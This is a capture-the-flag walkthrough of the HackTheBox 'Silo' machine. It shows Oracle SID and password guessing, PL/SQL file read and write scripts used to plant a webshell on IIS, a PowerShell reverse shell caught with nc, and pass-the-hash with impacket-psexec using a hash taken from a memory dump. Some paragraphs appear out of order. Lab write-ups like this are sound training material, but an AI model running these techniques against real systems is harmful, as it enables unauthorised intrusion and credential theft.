I really like this machine because I had the opportunity to play with the Oracle TNS DB for the first time and learn and use some new tools that helped me on the way. To start off, I will be using this database to upload a webshell on the webserver, which is going to help me get a PowerShell shell. For privilege escalation (privesc), which is the first time I find something like this in an HTB Box, I will be playing with a memory dump file to get a hash that I can use with PassTheHash to get a shell as Administrator. There is an unintended way to get the root flag before even getting a foothold; I will talk about it in Beyond Root..
Enumeration
As always, I begin with the enumeration of ports using nmap:
â nmap -p- 10.10.10.82 --min-rate 5000 -oA nmap/silo -v
Scanning 10.10.10.82 [65535 ports]
Discovered open port 80/tcp on 10.10.10.82
Discovered open port 139/tcp on 10.10.10.82
Discovered open port 8080/tcp on 10.10.10.82
Discovered open port 445/tcp on 10.10.10.82
Discovered open port 135/tcp on 10.10.10.82
Discovered open port 49152/tcp on 10.10.10.82
Discovered open port 49155/tcp on 10.10.10.82
Discovered open port 49162/tcp on 10.10.10.82
Discovered open port 49153/tcp on 10.10.10.82
Discovered open port 49160/tcp on 10.10.10.82
Discovered open port 49161/tcp on 10.10.10.82
Discovered open port 47001/tcp on 10.10.10.82
Discovered open port 5985/tcp on 10.10.10.82
Discovered open port 49154/tcp on 10.10.10.82
Discovered open port 1521/tcp on 10.10.10.82
Discovered open port 49159/tcp on 10.10.10.82
Completed Connect Scan at 06:42, 12.07s elapsed (65535 total ports)
Nmap scan report for 10.10.10.82
Host is up (0.029s latency).
Not shown: 65519 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1521/tcp open oracle
5985/tcp open wsman
8080/tcp open http-proxy
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
49161/tcp open unknown
49162/tcp open unknown
â nmap -sCV 10.10.10.82 -oA nmap/silo_scripts -v
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
8080/tcp open http Oracle XML DB Enterprise Edition httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=XDB
|_http-title: 401 Unauthorized
|_http-server-header: Oracle XML DB/Oracle Database
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-time:
| date: 2023-12-31T11:48:09
|_ start_date: 2023-12-31T11:18:37
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
I always like to go for small attack vectors and clear them out so when I go for a wide one, I can be more flexible even with time. For example, web apps have big attack vectors compared to other services. So, I will start with RPC:
â rpcclient -U '' -N 10.10.10.82
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
Same goes for the SMB server. Keeping in mind that if I get any credentials, I can retest these two services.
I went straight for the web app on port 80, where I found nothing useful except the default page of an IIS server (version 8.5). I will start fuzzing the web app to see if there is anything.
â gobuster dir -u http://10.10.10.82 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --no-error
I didn't find anything, so I will move on to the next web app on port 8080. When accessing this web app, it asks immediately for login before accessing its page. I tried some default credentials, but it didn't work, so I'm leaving this web app aside until I find some creds; maybe then I can log in.
First I will be enumerating the SID using a tool called odat.
â odat python3 odat.py sidguesser -s 10.10.10.82 -p 1521
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue... # | ETA: 00:00:00
100% |#######################################| Time: 00:00:51
XE is a valid SID.
The SID (Service Identifier) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID.
Now I will try to get some valid credentials using the passwordguesser argument with odat.
Since I have valid credentials, I will try to connect to the DB. I will be using sqlplus to connect to the DB, but first, I need to set it up. Following 0xdf's steps, I will need to download:
instantclient-basic-linux.x64-12.2.0.1.0.zip
instantclient-sdk-linux.x64-12.2.0.1.0.zip
instantclient-sqlplus-linux.x64-12.2.0.1.0.zip
unzip em in the same directory then open your terminal source file, in my case it is zsh, and add these lines:
â sqlplus scott/tiger@10.10.10.82:1521/XE as sysdba
SQL*Plus: Release 12.2.0.1.0 Production on Sun Dec 31 08:41:15 2023
Copyright (c) 1982, 2016, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL>
The "as sysdba" let me connect with system permissions, which facilitate reading through the database and making changes to the database configuration itself. I can see my user's permissions through:
SQL> select * from user_role_privs;
I can see that I have sys perms on the db, so I will try to write an oracle script that leads to reading files.
SQL> declare
2 f utl_file.file_type;
3 s varchar(200);
4 begin
5 f:= utl_file.fopen('/inetpub/wwwroot','iisstart.htm','R');
6 utl_file.get_line(f,s);
7 utl_file.fclose(f);
8 dbms_output.put_line(s);
9 end;
10 /
PL/SQL procedure successfully completed.
I successfully wrote and ran that script but I can't see the output so I will activate the serveroutput option.
SQL> set serveroutput ON
then I rerun my script by just running "/"
SQL> /
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
PL/SQL procedure successfully completed.
And now I can read files. I will try to write a file to the root directory of the webapp
SQL> declare
f utl_file.file_type;
s varchar(5000) := 'ichyaboy was here';
begin
f:= utl_file.fopen('/inetpub/wwwroot','test.htm','W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
/
PL/SQL procedure successfully completed.
â curl http://10.10.10.82/test.htm
ichyaboy was here
Going for webshell. I will use the cmd.aspx webshell at /usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx but I will remove the styling lines and some unnecessary lines so it will look like this
â www python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.82 - - [31/Dec/2023 09:09:09] "GET /shell.ps1 HTTP/1.1" 200 -
â ~ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.82] 49197
Windows PowerShell running as user SILO$ on SILO
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>
PS C:\users\Phineas\Desktop> type user.txt
a48e****************************
Privesc
Beside the user.txt file at Phineas's Desktop there is this Oracle issue.txt file.
PS C:\users\Phineas\Desktop> cat "Oracle issue.txt"
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):
Dropbox link provided to vendor (and password under separate cover).
Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password:
?%Hm8646uC$
I had trouble using the password because I didn't know that the first character was actually wrong due to an encoding issue. So, I will transfer the whole text as base64 to my host machine, then decode it to see what the actual password is.
â cat Oracle\ issue.txt
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):
Dropbox link provided to vendor (and password under separate cover).
Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password:
ÂŖ%Hm8646uC$
After unzipping the file
â file SILO-20180105-221806.dmp
SILO-20180105-221806.dmp: MS Windows 64bit crash dump, version 15.9600, 2 processors, DumpType (0x1), 261996 pages
its a memory dump file, so I will be using volatility to analyze this file but first i need a profile
Now I will use psexec from impacket to get a shell as Administrator
â impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82
C:\Windows\system32> whoami
nt authority\system
C:\Users\Administrator\Desktop> type root.txt
fb6b****************************
Beyond Root
Here, I will show how I could simply read the root.txt from the Oracle DB, which is easy. I just need to use the Oracle script I wrote to read files and specify the root.txt path.
SQL> declare
f utl_file.file_type;
s varchar(200);
begin
f:= utl_file.fopen('/Users/Administrator/Desktop','root.txt','R');
utl_file.get_line(f,s);
utl_file.fclose(f);
dbms_output.put_line(s);
end;
/
fb6b****************************
PL/SQL procedure successfully completed.
Now I went for the Oracle TNS DB. After reading about this type of database and exploring multiple attack paths, I found this article on Hacktricks () useful.
By accessing , I can run commands easily from the webshell. However, this shell isn't that much flexible, so I will go for a reverse shell. I will use /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1, rename it to shell.ps1, set up a Python HTTP server, and listen on port 9001.
